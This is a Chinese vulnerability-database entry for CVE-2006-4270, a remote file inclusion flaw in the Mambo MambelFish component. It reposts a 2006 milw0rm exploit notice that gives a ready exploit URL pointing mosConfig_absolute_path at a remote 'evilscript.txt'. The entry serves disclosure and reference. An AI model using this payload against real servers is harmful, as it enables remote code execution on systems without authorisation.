MambelFish组件'mambelfish.class.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110843 漏洞类型 代码注入
发布时间 2006-08-17 更新时间 2007-10-01
CVE编号 CVE-2006-4270 CNNVD-ID CNNVD-200608-339
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2202
https://cxsecurity.com/issue/WLB-2006080139
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-339
|漏洞详情
MambelFish是一个Mambo组件,用于支持手工翻译过程。MambelFish在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。模块的administrator/components/com_mambelfish/mambelfish.class.php脚本没有正确地验证mosConfig_absolute_path的输入:require_once("$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php");攻击者可以通过包含本地或外部资源的任意文件导致执行任意代码。成功攻击要求打开了register_globals。
|漏洞EXP
####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

mambo com_mambelfish Component (mosConfig_absolute_path) Remote File
Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################

Code: mambelfish.class.php?, line 28
***************************************************************************************************

  require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.php" );

***************************************************************************************************


Exploit:
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

####################################################
Greetz: Cyber-warrior TIM USERS
####################################################

# milw0rm.com [2006-08-17]
|参考资料

来源:XF
名称:mambelfish-class-file-include(28431)
链接:http://xforce.iss.net/xforce/xfdb/28431
来源:BID
名称:19574
链接:http://www.securityfocus.com/bid/19574
来源:BUGTRAQ
名称:20060817MambomambelfishComponent<=1.1RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443672/100/0/threaded
来源:VUPEN
名称:ADV-2006-3312
链接:http://www.frsirt.com/english/advisories/2006/3312
来源:SECUNIA
名称:21544
链接:http://secunia.com/advisories/21544
来源:MILW0RM
名称:2202
链接:http://milw0rm.com/exploits/2202
来源:SREASON
名称:1430
链接:http://securityreason.com/securityalert/1430